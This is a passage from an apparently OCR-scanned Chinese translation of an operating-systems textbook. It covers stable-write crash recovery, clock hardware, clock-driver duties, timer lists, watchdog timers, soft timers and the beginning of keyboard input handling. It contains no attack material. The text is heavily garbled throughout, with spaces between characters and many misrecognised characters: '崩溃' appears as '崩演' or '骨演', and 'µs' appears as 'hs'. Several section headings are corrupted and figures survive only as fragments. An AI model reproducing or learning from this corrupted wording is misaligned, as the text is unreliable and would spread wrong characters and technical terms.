刻 发 生 在 两 个 对 应 的 块 上 。 如 果 在 稳定 写 期 间 出 现 CPU 册 演 会 怎么 样 ? 
这 就 取决 于 毅 浊 发 生 的 精确 时 间 。 有 5 种 可 能 性 ， 如 图 5-31 所 示 。 
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在 图 5-31a 中 ，CPU 崩 演 发 生 在 写 块 的 两 个 副本 之 前 。 在 恢复 的 时 
候 ， 什 么 都 不 用 修改 而 旧 的 值 将 继续 存在 ， 这 是 允许 的 。 


在 图 5-31b 中 ，CPU 衣 尝 发 生 在 写 驱 动 器 1 期 间 ， 破 坏 了 该 块 的 内 
容 。 然 而 恢复 程序 能 够 检测 出 这 一 错误 ， 并 且 从 驱动 硕 2 恢 复 驱 动 器 1 上 
的 块 。 因此， 这 一 和 崩 尝 的 影响 被 消除 并 且 旧 的 状态 完全 被 恢复 。 


在 图 5-31c 中 ，CPU 崩 演 发 生 在 写 完 驱 动 右 1 之 后 但 是 还 没有 写 驱 动 
恬 2 之 前 。 此 时 已 经 过 了 无 法 复原 的 时 刻 : 恢复 程序 将 块 从 驱动 器 1 复 制 
到 驱动 器 2 上 。 写 是 成 功 的 。 





图 5-31d 与 图 5-31b 相 类 似 : 在 恢复 期 间 用 好 的 块 敢 盖 坏 的 块 。 不 同 
的 是 ， 两 个 块 的 最 终 取 值 都 是 新 的 。 





最 后 ， 在 图 5-3le 中 ， 恢 复 程 序 看 到 两 个 块 是 相同 的 ， 所 以 什么 都 
不 用 修改 并 且 在 此 处 写 也 是 成 功 的 。 


对 于 这 一 模式 进行 各 种 各 样 的 优化 和 改进 都 是 可 能 的 。 首 先 ， 在 崩 
溃 之 后 对 所 有 的 块 两 个 两 个 地 进行 比较 是 可 行 的， 但 是 代价 高 晶 。 一 个 
巨大 的 改进 是 在 稳定 写 期 间 跟 踪 被 写 的 是 哪个 块 ， 这 样 在 恢复 的 时 候 必 
须 被 检验 的 块 就 只 有 一 个 。 某 些 计算 机 拥有 少量 的 非 易 失 性 
RAM (nonvolatile RAM) ， 它 是 一 个 特殊 的 CMOS 存 储 器 ， 由 锂电 池 供 
电 。 这 样 的 电池 能 够 维持 很 多 年 ， 甚 至 有 可 能 是 计算 机 的 整个 生命 周 
期 。 与 主 存 不 同 ( 它 在 月 湿 之 后 就 丢失 了 ) ， 非 易 失 性 RAM 在 骨 演 之 
后 并 不 丢失 。 每 天 的 时 间 通 常 就 保存 在 这 里 并且 通 过 一 个 特殊 的 电路 
进行 增值 ) ， 这 就 是 为 什么 计算 机 即使 在 拔 掉 电 源 之 后 仍然 知道 是 什么 
时 间 。 


























假设 非 易 失 性 RAM 的 几 个 字 节 可 供 操 作 系 统 使 用 ， 稳 定 写 就 可 以 
在 开始 写 之 前 将 准备 要 更 新 的 块 的 编写 放 到 非 易 失 性 RAM 里 。 在 成 功 
地 完成 稳定 写 之 后 ， 在 非 易 失 性 RAM 中 的 块 编号 用 一 个 无 效 的 块 编号 
例如 -1) 履 兰 抒 。 在 这 些 情形 下 ， 衣 误 之 后 恢复 程序 可 以 检验 非 易 失 
性 RAM 以 了 解 在 骨 浊 期 间 是 否 有 一 个 稳定 写 正 在 进行 中 ， 如 果 是 的 
话 ， 还 可 以 了 解 在 月 误 发 生 的 时 候 被 写 的 是 哪 一 个 块 。 然 后 ， 可 以 对 块 











的 两 个 副本 进行 正确 性 和 一 致 性 检验 。 


如 果 没 有 非 易 失 性 RAM 可 用 ， 可 以 对 它 模拟 如 下 。 在 稳定 写 开始 
时 ， 用 将 要 被 稳定 写 的 块 的 编号 覆盖 驱动 器 1 上 的 一 个 固定 的 块 ， 然 后 
读 回 该 块 以 对 其 进行 校 验 。 在 使 得 该 块 正确 之 后 ， 对 驱动 器 2 上 对 应 的 
块 进行 写 和 校 验 。 当 稳定 写 正确 地 完成 时 ， 用 一 个 无 效 的 块 编号 覆盖 两 
个 块 并 进行 校 验 。 这 样 一 来 ， 骨 溃 之 后 就 很 容易 确定 在 崩溃 期 间 是 否 
一 个 稳定 写 正在 进行 中 。 当 然 ， 这 一 技术 为 了 写 一 个 稳定 的 块 需要 8 次 
额外 的 磁盘 操作 ， 所 以 应 该 极 少量 地 应 用 该 技术 。 

















还 有 最 后 一 点 值得 讨论 。 我 们 假设 每 天 每 一 对 块 只 发 生 一 个 好 块 目 
发 损坏 成 为 坏 块 。 如 果 经 过 足够 长 的 时 间 ， 另 一 个 块 也 可 能 变 坏 。 因 
此 ， 为 了 修复 任何 损害 每 天 必须 对 两 块 磁盘 进行 一 次 完整 的 扫描 。 这 
样 ， 每 天 早晨 两 块 磁盘 总 是 一 模 一 样 的 。 即 便 在 一 个 时 期 内 一 对 中 的 两 
个 块 都 坏 了 ， 所 有 的 错误 也 都 能 正确 地 修复 。 





5.5 ”时 钟 


时 钟 (clock)〉 又 称 为 定时 器 (timer) ， 由 于 各 种 各 样 的 原因 决定 
了 它 对 于 任何 多 道 程序 设计 系统 的 操作 都 是 至 关 重 要 的 。 时 钟 负责 维 护 
时 间 ， 并 且 防 止 一 个 进程 垄断 CPU， 此 外 还 有 其 他 的 功能 。 时 钟 软件 可 
以 采用 设备 驱动 程序 的 形式 ， 尽 管 时 钟 既 不 像 磁盘 那样 是 一 个 块 设 备 ， 
也 不 像 鼠 标 那样 是 一 个 字符 设备 。 我 们 对 时 钟 的 研究 将 遵循 与 前 面 几 节 
相同 的 模式 : 首先 考虑 时 钟 硬件 ， 然 后 考虑 时 钟 软件 。 





5.5.1 ”时钟 硬件 


在 计算 机 里 通常 使 用 两 种 类 型 的 时 钟 ， 这 两 种 类 型 的 时 钟 与 人 们 使 
用 的 钟表 和 手表 有 相当 大 的 差异 。 比 较 简 单 的 时 钟 被 连接 到 110V 或 
220V 的 电源 线 上 ， 这 样 每 个 电压 周期 产生 一 个 中 断 ， 频 率 是 50Hz 或 
60Hz。 这 些 时 钟 过 去 曾经 占据 统治 地 位 ， 但 是 如 今 却 非 常 罕见 。 








为 一 种 类 型 的 时 钟 由 三 个 部 件 构成 ， 吕 体 振荡 器 、 计 数 器 和 存储 寄 
存 器 ， 如 图 5-32 所 示 。 当 把 一 块 石英 晶体 适当 地 切割 并 且 安 装 在 一 定 的 
压力 之 下 时 ， 它 就 可 以 产生 非常 精确 的 周期 性 信号 ， 典 型 的 频率 范围 是 
几 百 兆 医 北 ， 具 体 的 频率 值 与 所 选 的 晶体 有 关 。 使 用 电子 器 件 可 以 将 这 
一 基础 信号 乘 以 一 个 小 的 整数 来 获得 高 达 1000MHz 甚 全 更 高 的 频率 。 在 








任何 一 台 计 算 机 里 通常 都 可 以 找到 至 少 一 个 这 样 的 电路 ， 它 给 计算 机 的 
各 种 电路 提供 同步 信号 。 该 信号 被 送 到 计数 器 ， 使 其 递减 计数 至 0。 当 
计数 器 变 为 0 时 ， 产 生 一 个 CPU 中 断 。 


晶体 振荡 器 


nln 


计数 器 在 每 一 
个 脉冲 递减 。 


于 加 载 计数 器 


图 5-32 可 编程 时 钟 





可 编程 时 钟 通常 具有 几 种 操作 模式 。 在 一 次 完成 模式 (one-shot 
mode) 下 ， 当 时 钟情 动 时 ， 它 把 存储 寄存 需 的 值 复制 到 计数 器 中 ， 然 
后 ， 来 自 唱 体 的 每 一 个 脉冲 使 计数 喜 减 1。 当 计数 需 变 为 0 时 ， 产 生 一 个 
中 新， 并 停止 工作 ， 直 到 软件 再 一 次 显 式 地 局 动 它 。 在 方 波 模式 
(square-wave mode) 下 ， 当 计数 喜 变 为 0 并 且 产 生 中 断 之 后 ， 存 储 寄存 
峰 的 值 目 动 复制 到 计数 器 中 ， 并 且 整 个 过 程 无 限期 地 再 次 重复 下 去 。 这 
些 周期 性 的 中 断 称 为 时 钟 滴答 Cclock tick) 。 














可 编程 时 钟 的 优点 是 其 中 靳 频率 可 以 由 软件 控制 。 如 有 果 采 用 
500MHz 的 品 体 ， 那 么 计数 器 将 每 阳 2ns 脉 动 一 次 。 对 于 【无 符 写 )32 位 
寄存 器 ， 中 断 可 以 被 编程 为 从 2ns 时 间 间 隔 发 生 一 次 到 8.6s 时 间 间 隔 发 生 
一 次 。 可 编程 时 钟 心 厂 通 闸 包含 两 个 或 三 个 独立 的 可 编程 时 钟 ， 并 且 还 
具有 许多 其 他 选项 (例如 ， 用 正 计 时 代 蔡 倒计时、 屏蔽 中 断 等 )。 


为 了 防止 计算 机 的 电源 被 切断 时 丢失 当前 时 间 ， 大 多 数 计算 机 具有 
一 个 由 电池 供电 的 备份 时 钟 ， 它 是 由 在 数字 手表 中 使 用 的 那 种 类 型 的 低 
功 耗 电路 实现 的 。 电 池 时 钟 可 以 在 系统 启动 的 时 候 读 出 。 如 果 不 存 在 备 
份 时 钟 ， 软 件 可 能 会 向 用 户 询问 当前 日 期 和 时 间 。 对 于 一 个 连 入 网 络 的 
系统 而 言 还 有 一 种 从 远程 主机 获取 当前 时 间 的 标准 方法 。 无 论 是 哪 种 情 
况 ， 当 前 时 间 都 要 像 UNIX 所 做 的 那样 转换 成 目 1970 年 1 月 1 日 上 午 12 时 
UTC (Universal Time Coordinated， 协 调 世 界 时 ， 以 前 称 为 格林 威 治平 
均 时 ) 以 来 的 时 钟 滴答 数 ， 或 者 转换 成 自 某 个 其 他 标准 时 间 以 来 的 时 钟 
滴答 数 。Windows 的 时 间 原 点 是 1980 年 1 月 1 日 。 每 一 次 时 钟 滴答 都 使 实 
际 时 间 增 加 一 个 计数 。 通 常会 提供 实用 程序 来 手工 设置 系统 时 钟 和 备份 
时 钟 ， 并 且 使 两 个 时 钟 保持 同步 。 





5.5.2 “时钟 软 件 


时 钟 硬 件 所 做 的 全 部 工作 是 根据 已 知 的 时 间 间 隔 产 生 中 断 。 涉 及 时 
间 的 其 他 所 有 工作 都 必须 由 软件 一 一 时 钟 驱动 程序 完成 。 时 钟 驱动 程序 
的 确切 任务 因 操作 系统 而 异 ， 但 通常 包括 下 面 的 大 多 数 任务 : 


1) 维 护 日 时 间 。 

2) 防 止 进程 超时 运行 

3) 对 CPU 的 使 用 情况 记 账 。 

4) 处 理 用 户 进程 提出 的 alarm 系 统 调 用 。 
5) 为 系统 本 身 的 各 个 部 分 提供 监视 定时 器 。 
6) 完 成 概要 剖析 、 监 视 和 统计 信息 收集 。 


时 钟 的 第 一 个 功能 是 维持 正确 的 日 时 间 ， 也 称 为 实际 时 间 Creal 
time) ， 这 并 不 难 实现 ， 只 需要 如 前 面 提 到 的 那样 在 每 个 时 钟 滴答 将 计 
数 器 加 1 即 可 。 人 惟一 要 当心 的 事情 是 日 时 间 计 数 器 的 位 数 ， 对 于 一 个 频 
率 为 60Hz 的 时 钟 来 说 ，32 位 的 计数 器 仅仅 超过 2 年 就 会 溢出 。 很 显然 ， 
系统 不 可 能 在 32 位 中 按照 自 1970 年 1 月 1 日 以 来 的 时 钟 滴答 数 来 保存 实际 
时 间 。 





可 以 采取 三 种 方法 来 解决 这 一 问题 。 第 一 种 方法 是 使 用 一 个 64 位 的 
计数 器 ， 但 这 样 做 使 维护 计数 器 的 代价 很 高 ， 因 为 1 秒 内 需要 做 很 多 次 
维护 计数 融 的 工作 。 第 二 种 方法 是 以 秒 为 单位 维护 日 时 间 ， 而 不 是 以 时 
钟 滴答 为 单位 ， 该 方法 使 用 一 个 辅助 计数 喜来 对 时 钟 滴答 计数 ， 直 到 昧 
计 完 整 的 一 秒 。 因 为 2% 秒 超过 了 136 年 ， 所 以 该 方法 可 以 工作 到 22 世 
纪 。 








三 种 方法 是 对 时 钟 滴答 计数 ， 但 是 这 一 计数 工作 是 相对 于 系统 引 
导 的 时 间 ， 而 不 是 相对 于 一 个 固定 的 外 部 时 间 。 当 读 入 备份 时 钟 或 者 用 
尸 输 入 实际 时 间 时 ， 系 统 引 导 时 间 束 从 当前 日 时 间 开 始 计算 ， 并且 以 任 
何方 便 的 形式 存放 在 内 存 中 。 以 后 ， 当 请 求 日 时 间 时 ， 存 储 的 日 时 间 值 
加 到 计数 器 上 就 可 以 得 到 当前 的 日 时 间 。 所 有 这 三 种 方法 如 图 5-33 所 











64 位 


-| -一 32 位 一 -| -一 32 位 一 


以 秒 为 单位 ”在 当前 一 秒 内 以 时 钟 滴答 / L 


的 日 时 间 ”的 时 钟 滴答 数 为 单位 计数 
以 秒 为 单位 的 系 
统 引 导 时 间 
a) b) c) 








以 时 钟 滴 答 为 单位 的 日 时 间 





图 5-33 维护 日 时 间 的 三 种 方法 





时 钟 的 第 二 个 功能 是 防止 进程 超时 运行 。 每 当 启 动 一 个 进程 时 ， 调 
度 程序 就 将 一 个 计数 器 初始 化 为 以 时 钟 滴 答 为 单位 的 该 进程 时 间 片 的 取 





值 。 每 次 时 钟 中 断 时 ， 时 钟 驱 动 程序 将 时 间 片 计数 融 减 1。 当 计数 器 变 
为 0 时 ， 时 钟 驱动 程序 调用 调度 程 友 以 激活 力 一 个 进程 。 


时 钟 的 第 三 个 功能 是 CPU 记 账 。 最 精确 的 记 账 方法 是 ， 每 当 一 个 进 
程 启动 时 ， 便 有 局 动 一 个 不 同 于 主 系统 定时 露 的 辅助 定时 器 。 当 进程 终止 
时 ， 读 出 这 个 定时 喜 的 值 就 可 以 知道 该 进程 运行 了 多 长 时 间 。 为 了 正确 
地 记 账 ， 当 中 断 发 生 时 应 该 将 辅助 定时 志保 存 起 来 ， 中 断 结 束 后 再 将 其 
恢复 。 




















一 个 不 太 精 确 但 更 加 简单 的 记 账 方法 是 在 一 个 全 局 变量 中 维护 一 个 
旨 针 ， 该 指针 指向 进程 表 中 当前 运行 的 进程 的 表 项 。 在 每 一 个 时 钟 滴 
答 ， 使 当前 进程 的 表 项 中 的 一 个 域 加 1。 通 过 这 一 方法 ， 每 个 时 钟 滴答 
由 在 该 滴答 时 刻 运行 的 进程 “付费 ?”。 这 一 策略 的 一 个 小 问题 是 : 如果 在 
一 个 进程 运行 过 程 中 多 次 发 生 中 断 ， 即 使 该 进程 没有 做 多 少 工作 ， 它 仍 
然 要 为 整个 滴答 付费 。 由 于 在 中 断 期 间 恰 当地 对 CPU 进行 记 账 的 方法 代 
价 过 于 昂 贯 ， 因 此 很 少 使 用 。 





在 许多 系统 中 ， 进 程 可 以 请 求 操 作 系 统 在 一 定 的 时 间 间 隅 之 后 同 它 
报警 。 警 报 通常 是 信号 、 中 断 、 消 息 或 者 类 似 的 东西 。 需 要 这 类 报警 的 
一 个 应 用 是 网 络 ， 当 一 个 数据 包 在 一 定时 间 间 隅 之 内 没有 被 确认 时 ， 该 
数据 包 必 须 重 及 。 故 一 个 应 用 是 计算 机 辅助 教学 ， 如 末 学 生 在 一 定时 间 
内 没有 啊 应 ， 就 告诉 他 答案 。 











如 果 时 钟 驱动 程序 拥有 足够 的 时 钟 ， 它 束 可 以 为 每 个 请 求 设置 一 个 
单独 的 时 钟 。 如 果 不 是 这 样 的 情况 ， 它 整 必 须 用 一 个 物理 时 钟 来 模拟 多 
个 虚拟 时 钟 。 一 种 方法 是 维护 一 张 表 ， 将 所 有 未 完成 的 定时 器 的 信号 时 
刻 记 入 表 中 ， 还 要 维护 一 个 变量 给 出 下 一 个 信号 的 时 刻 。 每 当日 时 间 更 
新 时 ， 时 钟 驱动 程序 进行 检查 以 了 解 最 近 的 信 写 是 否 已 经 及 生 。 如 果 是 
的 话 ， 则 在 表 中 搜索 下 一 个 要 发 生 的 信号 的 时 刻 。 




















如 果 预 期 有 许多 信号 ， 那 么 通过 在 一 个 链表 中 把 所 有 未 完成 的 时 钟 
请 求 按时 间 排 序 链接 在 一 起 ， 这 样 来 模拟 多 个 时 钟 则 更 为 有 效 ， 如 图 5- 
34 所 示 。 链 表 中 的 每 个 表 项 指出 在 前 一 个 信号 之 后 等 待 多少 时钟 滴答 引 
发 下 一 个 信号 。 在 本 例 中 ， 等 待 处 理 的 信号 对 应 的 时 钟 滴答 分 别 是 
4203、4207、4213、4215 和 4216。 








当前 时 = 下 一 个 信和 号 


ET 加 -上 -加 -加 


图 5-34 用 单个 时 钟 模拟 多 个 定时 器 





在 图 5-34 中 ， 经 过 3 个 时 钟 滴答 发 生 下 一 个 中 断 。 每 一 次 滴答 时 ， 
下 一 个 信号 减 1， 当 它 变 为 0 时 ， 就 引发 与 链表 中 第 一 个 表 项 相对 应 的 信 


号 ， 并 将 这 一 表 项 从 链表 中 删除 ， 然 后 将 下 一 个 信号 设置 为 现在 处 于 链 
表 头 的 表 项 的 取 值 ， 在 本 例 中 是 4。 





注意 在 时 钟 中 断 期 间 ， 时 钟 驱 动 程序 要 做 儿 件 事情 一 一 将 实际 时 间 
增 1， 将 时 间 毛 减 1 并 检查 它 是 否 为 0， 对 CPU 记 账 ， 以 及 将 报警 计数 句 
减 1。 然 而 ， 因 为 这 些 操作 在 每 一 秒 之 中 要 重复 许多 次 ， 所 以 每 个 操作 
都 必须 仔细 地 安排 以 加 快速 度 。 














操作 系统 的 组 成 部 分 也 需要 设置 定时 器 ， 这 些 定时 器 被 称 为 监视 定 
时 器 (watchdog timer) |'!. 。 例 如， 为 了 避免 磨损 介质 和 磁头 ， 软 盘 在 
不 使 用 时 是 不 旋转 的 。 当 数据 需要 从 软盘 读 出 时 ， 电 机 必须 首先 启动 。 
只 有 当 软 盘 以 全 速 旋 转 时 ，LIO 才 可 以 开始 。 当 一 个 进程 试图 从 一 个 空 
闲 的 软盘 读 取 数据 时 ， 软 盘 驱 动 程序 启动 电机 然后 设置 一 个 监视 定时 器 
以 便 在 足够 长 的 时 间 间 隔 之 后 引发 一 个 中 断 《〈 因 为 不 存在 来 自 软盘 本 身 
的 达到 速度 的 中 断 ) 。 








时 钟 驱 动 程序 用 来 处 理 监 视 定 时 器 的 机 制 和 用 于 用 户 信号 的 机 制 是 
相同 的 。 惟 一 的 区 别 是 当 一 个 定时 器 时 间 到 时 ， 时 钟 驱动 程序 将 调用 一 
个 由 调用 者 提供 的 过 程 ， 而 不 是 引发 一 个 信号 。 这 个 过 程 是 调用 者 代码 
的 一 部 分 。 被 调用 的 过 程 可 以 做 任何 需要 做 的 工作 ， 甚 至 可 以 引发 一 个 
中 断 ， 但 是 在 内 核 之 中 中 断 通常 是 不 方便 的 并 且 信 号 也 不 存在 。 这 就 是 
为 什么 要 提供 监视 定时 嚣 机制 。 值 得 注意 的 是 ， 只 有 当时 钟 驱动 程序 与 
被 调用 的 过 程 处 于 相同 的 地 址 空间 时 ， 监 视 定 时 融 机 制 才 起 作用 。 




















时 钟 最 后 要 做 的 事情 是 剖析 (profiling) 。 某 些 操作 系统 提供 了 一 
种 机 制 ， 通 过 该 机 制 用 户 程 序 可 以 让 系统 构造 它 的 程序 计数 器 的 一 个 直 
方 图 ， 这 样 它 束 可 以 了 解 时 间 花 在 了 什么 地 方 。 当 副 析 是 可 能 的 事情 
时 ， 在 每 一 时 钟 涌 管 驱动 程序 都 要 检查 当前 进程 是 否 正 在 被 进行 剖析 ， 
如 果 是 ， 则 计算 对 应 于 当前 程序 计数 器 的 区 间 (bin〉 趾 号 (一 段 地 址 
范围 ) ， 然 后 将 该 区 间 的 值 加 1。 这 一 机 制 也 可 用 来 对 系统 本 吴 进 行 齐 
析 。 








[1] watchdog timet 也 经 常 译 为 看 门 狗 定时 器 。 译 者 注 

D] HAA (histogram) 用 于 描述 随机 变量 取 值 分 布 的 情况 ， 虽 然 在 中 文 
术语 中 有 一 个 “图 ” 字 ， 但 并 不 是 必须 用 图 形 来 表示 。 它 将 随机 变量 

(对 于 本 例 而 言 是 程序 计数 器 的 取 值 ) 的 值 空间 〈 对 于 本 例 而 言 是 进程 
的 地 址 空间 ) 划分 成 若干 个 小 的 区 间 ， 每 个 小 区 间 就 是 一 个 bin。 通 过 

计算 随机 变量 的 取 值 落 在 每 个 小 区 间 内 的 次 数 就 可 以 得 到 直方 图 。 如 果 
用 图 形 表 示 直 方 图 的 话 则 表现 为 一 系列 高 度 不 等 的 柱状 图 形 。 译 者 





VE. 


5.5.3 KERNE 


大 多 数 计算 机 拥有 辅助 可 编程 时 钟 ， 可 以 设置 它 以 程序 需要 的 任何 
速率 引发 定时 器 中 断 。 该 定时 器 是 主 系统 定时 器 以 外 的 ， 而 主 系统 定时 
器 的 功能 已 经 在 上 面 讲述 了 。 只 要 中 断 频 率 比 较 低 ， 将 这 个 辅助 定时 器 
用 于 应 用 程序 特定 的 目的 就 不 存在 任何 问题 。 但 是 当 应 用 程序 特定 的 定 
时 器 的 频率 非常 高 时 ， 麻 烦 就 来 了 。 下 面 我 们 将 简要 描述 一 个 基于 软件 
的 定时 器 模式 ， 它 在 许多 情况 下 性 能 良好 ， 甚 至 在 相当 高 的 频率 下 也 是 
如 此 。 这 一 思想 起 因 于 (Aron 和 Druschel，1999) 。 关 于 更 详细 的 细 
节 ， 请 参阅 他 们 的 论文 。 














一 般 而 言 ， 有 两 种 方法 管理 WO: 中 断 和 轮 询 。 中 断 具 有 较 低 的 等 
待 时间 ， 也 就 是 说 ， 它 们 在 事件 本 身 之 后 立即 发 生 ， 有 具有 很 少 的 延迟 或 
者 没有 延迟 。 另 一 方面 ， 对 于 现代 CPU 而 言 ， 由 于 需要 上 下 文 切换 以 及 
对 于 流水 线 、ITLB 和 高 速 缓存 的 影响 ， 中 断 具 有 相当 大 的 开销 。 




















蔡 代 中 断 的 是 让 应 用 程序 对 它 本 身 期 待 的 事件 进行 轮 询 。 这 样 做 避 
免 了 中 断 ， 但 是 可 能 存在 相当 长 的 等 待 时 间 ， 因 为 一 个 事件 可 能 正好 发 
生 在 一 次 轮 询 之 后 ， 在 这 种 情况 下 它 就 要 等 待 几乎 整个 轮 询 间隔 。 平 均 
而 言 ， 等 待 时 间 是 轮 询 间隔 的 一 半 。 








对 于 菏 些 应 用 而 言 ， 中 断 的 开销 和 轮 询 的 等 待 时 间 都 是 不 能 接受 


的 。 例 如 ， 考 碟 一 个 高 性 能 的 网 络 ， 如 干 兆 位 以 太 网 。 该 网 络 能 够 每 
12hs 接 收 或 者 用 送 一 个 全 长 的 数据 包 。 为 了 以 优化 的 输出 
隔 12hs 就 应 该 发 出 一 个 数据 包 。 


达到 这 一 速率 的 一 种 方法 是 当 一 个 数据 包 传 输 完 成 时 引发 一 个 中 
扬 ， 或 者 将 辅助 定时 器 设置 为 每 12hs 中 断 一 次 。 问 题 是 在 一 个 300 MHz 
的 Pentium II 计算 机 上 该 中 断 经 实测 要 花费 4.45hs 的 时 间 〈Aron 和 
Druschel, 1999) 。 这 样 的 开销 比 20 世 纪 70 年 代 的 计算 机 好 不 了 多 少 。 
例如 ， 在 大 多 数 小 型 机 上 ， 一 个 中 断 要 占用 4 个 总 线 周 期 : 将 程序 计数 
器 和 PSW 压 入 堆栈 并 且 加 载 一 个 新 的 程序 计数 器 和 PSW。 现 如 今 涉 及 流 
水 线 、MMU、TLB 和 高 速 缓存 ， 更 是 增加 了 大 量 的 开销 。 这 些 影响 可 
能 在 时 间 上 使 情况 变 得 更 坏 而 不 是 变 得 更 好 ， 因 此 抵消 了 更 快 的 时 钟 速 
率 。 





FEI as Csoft timer) 避免 了 中 断 。 无 论 何 时 当 内 核 因 某 种 其 他 原 
因 在 运行 时 ， 在 它 返 回 到 用 户 态 之 前 ， 它 都 要 检查 实时 时 钟 以 了 解 软 定 
时 器 是 否 到 期 。 如 果 这 个 定时 器 已 经 到 期 ， 则 执行 被 调度 的 事件 〈 例 
如 ， 传 送 数据 包 或 者 检查 到 来 的 数据 包 ) ， 而 无 需 切换 到 内 核 态 ， 因 为 
系统 已 经 在 内 核 态 。 在 完成 工作 之 后 ， 软 定时 器 被 复位 以 便 再 次 闸 啊 。 
要 做 的 全 部 工作 是 将 当前 时 钟 值 复制 给 定时 器 并 且 将 超时 间隔 加 上 。 








软 定 时 占 随 看 因为 其 他 原因 进入 内 核 的 频率 而 脉动 。 这 些 原 因 包 
fi: 


1) 系 统 调用 。 
2)TLB 未 命中 。 
3) 页 面 故障 。 
4)1/O 中 断 。 


5)CPU 变 成 空闲 。 








为 了 了 解 这 些 事件 发 生得 有 多 频繁 ，Aron 和 Druschel 对 于 几 种 CPU 
负载 进行 了 测量 ， 包 括 全 负载 Web 服 务 器 、 具 有 计算 约束 后 台 作 业 的 
Web 服 务 器 、 从 因特网 上 播放 实时 首 频 以 及 重 编译 UNIX 内 核 。 进 入 内 
核 的 平均 进入 率 在 2hs 到 1hs 之 间 变 化 ， 其 中 大 约 一 半 是 系统 调用 。 因 
此 ， 对 于 一 阶 近似 ， 让 一 个 软 定时 器 每 隔 2hs 亲 响 一 次 是 可 行 的 ， 虽 然 
这 样 做 偶尔 会 错过 最 终 时 限 。 对 于 发 送 数据 包 或 者 轮 询 到 来 的 数据 包 这 
样 的 应 用 而 言 ， 有 时 可 能 晚 10hs 比 让 中 断 消 耗 35% 的 CPU 时 间 要 好 。 








当然 ， 可 能 有 一 段 时 间 不 存在 系统 调用 、TLB 未 命中 或 页 面 故 障 ， 
在 这 些 情况 下 ， 没 有 软 定 时 露 会 闸 啊 。 为 了 在 这 些 时 间 间 隔 上 设置 一 个 
最 大 值 ， 可 以 将 辅助 硬件 定时 器 设置 为 每 隔 一 定时 间 《〈 例 如 lms) al 
一 次 。 如 果 应 用 程序 对 于 偶然 的 时 间 间 隔 能 够 忍受 每 秒 只 有 1000 个 数据 
包 ， 那 么 软 定时 器 和 低频 硬件 定时 器 的 组 合 可 能 比 纯粹 的 中 断 驱 动 /O 
或 者 纯粹 的 轮 询 要 好 。 








5.6 ”用户 界面 : EA pep Ph alas 


每 台 通用 计算 机 都 配 有 一 个 键盘 和 一 个 监视 器 (并 且 通 常 还 有 一 只 
鼠标 )， 使 人 们 可 以 与 之 交互 。 尽 省 键盘 和 监视 莫 在 技术 上 是 独立 的 设 
备 ， 但 是 它们 紧密 地 一 同 工 作 。 在 大 型 机 上 ， 通 常 存在 许多 远程 用 户 ， 
每 个 用 户 拥 有 一 个 设备 ， 该 设备 包括 一 个 键盘 和 一 个 连 在 一 起 的 显示 器 
作为 一 个 单位 。 这 些 设备 在 历史 上 被 称 为 终端 〈terminal) 。 人 们 通常 
继续 使 用 该 术语 ， 即 便 是 讨论 个 人 计算 机 时 主要 是 因为 缺乏 更 好 的 术 


tA) 。 














561 IAIK 


用 户 输入 主要 来 自 键盘 和 鼠标 ， 所 以 我 们 要 了 解 它们 。 在 个 人 计算 
机 上 ， 键 盘 包含 一 个 嵌入 式微 处 理 器 ， 该 微 处 理 器 通过 一 个 特殊 的 串 行 
端口 与 主板 上 的 控制 芯片 通信 (尽管 键盘 越 来 越 多 地 连接 到 USB 端 口 
上 ) 。 每 当 一 个 键 被 按 下 的 时 候 都 会 产生 一 个 中 断 ， 并 且 每 当 一 个 键 被 
释放 的 时 候 还 会 产生 第 二 个 中 断 。 在 发 生 每 个 这 样 的 键盘 中 断 时 ， 键 盘 
驱动 程序 都 要 从 与 键盘 相关 联 的 IO 端 口 提取 信息 ， 以 了 解 发 生 了 什么 
事情 。 其 他 的 一 切 事情 都 是 在 软件 中 发 生 的 ， 在 相当 大 的 程度 上 独立 于 
硬件 。 

















当 想 象 往 shell 窗 口 〈 命 令 行 界面 ) 键入 命令 时 ， 可 以 更 好 地 理解 本 
小 节余 下 的 大 部 分 内 容 。 这 是 程序 员 通 名 的 工作 方式 。 我 们 将 在 下 面 讨 
论 图 形 界 面 。 





1. 键 盘 软 件 


IO 端口 中 的 数字 是 键 编 号 ， 称 为 扫描 码 Cscancode) ， 而 不 是 
ASCII 码 。 键 盘 所 拥有 的 键 不 超过 128 个 ， 所 以 只 需 7 个 位 表示 键 编号 。 
当 键 按 下 时 ， 第 8 位 设置 为 0， 当 键 释放 时 ， 第 8 位 设置 为 1。 跟 踪 每 个 键 
的 状态 ( 按 下 或 弹 起 ) 是 驱动 程序 的 任务 。 


例如 ， 当 A 键 被 按 下 时 ， 扫 描 码 (30) 被 写 入 一 个 IO 寄存 器 。 驱 动 
程序 应 该 负责 确定 键入 的 是 小 写字 母 、 大 写字 母 、CTRL-A、ALT-A、 
CTRL-ALT-A 还 是 某 些 其 他 组 合 。 由 于 驱动 程序 可 以 断定 哪些 键 已 经 按 
下 但 是 还 没有 被 释放 (例如 SHIFT) ， 所 以 它 拥有 足够 多 的 信息 来 做 这 
= 





例如 ， 击 键 序列 


按 下 SHIFT， 按 下 A， 释 放 A， 释 放 SHIFT 








指示 的 是 大 写字 母 A。 然 而 击 键 序列 


按 下 SHIFT， 按 下 A， 释 放 SHIFT， 释 放 A 


指示 的 也 是 大 写字 母 A。 尽 管 该 键盘 接口 将 所 有 的 负担 都 加 在 软件 
上 ， 但 是 却 极其 灵活 。 例 如 ， 用 户 程序 可 能 对 刚刚 键入 的 一 个 数字 是 来 
目 顶 端的 一 排 键 还 是 来 自 边 上 的 数字 键盘 感 兴趣 。 原 则 上 ， 驱 动 程序 能 
够 提供 这 一 信息 。 














键盘 驱动 程序 可 以 采纳 两 种 可 能 的 处 理 方法 。 在 第 一 种 处 理 方法 
中 ， 了 驱动 程序 的 工作 只 是 接收 输入 并 且 不 加 修改 地 向 上 层 传送 。 这 样 ， 
从 键盘 读数 据 的 程序 得 到 的 是 ASCII 码 的 原始 序列 。《 向 用 户 程序 提供 
扫描 码 过 于 原始 ， 并 且 高 度 地 依赖 于 机 右 。 ) 





这 种 处 理 方法 非常 适合 于 像 emacs 那 样 的 复杂 屏幕 编辑 器 的 需要 ， 
它 人 允许 用 户 对 任意 字符 或 字符 序列 施加 任意 的 动作 。 然 而 ， 这 意味 着 如 
果 用 户 键入 的 是 dste 而 不 是 date， 为 了 修改 错误 而 键入 三 个 退 格 键 和 
ate， 然 后 是 一 个 回 车 键 ， 那 么 提供 给 用 户 程序 的 是 键入 的 全 部 11 个 
ASCII 码 ， 如 下 所 示 : 














dst 一 一 一 at CR 








